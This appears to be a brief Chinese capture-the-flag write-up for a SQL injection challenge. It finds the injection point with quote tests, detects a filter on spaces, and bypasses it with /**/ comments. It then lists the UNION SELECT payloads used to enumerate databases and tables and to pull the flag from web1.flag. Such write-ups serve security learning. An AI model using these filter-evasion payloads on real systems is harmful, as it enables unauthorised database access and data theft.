尝试
1
1’
1”
发现1’还是会报错,所以注入口还是1’
再试试1\' and \'1\'=\'1发现报出SQLi detected!
取消空格试试1\'and\'1\'=\'1
似乎可以进入,应该就是过滤了空格
我们仍使用/**/的方法
1\'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/\'1\'=\'1
查询数据库表信息
查询数据表web1下的列信息
1\'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=\'web1
然后查询flag
1\'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/\'1\'=\'1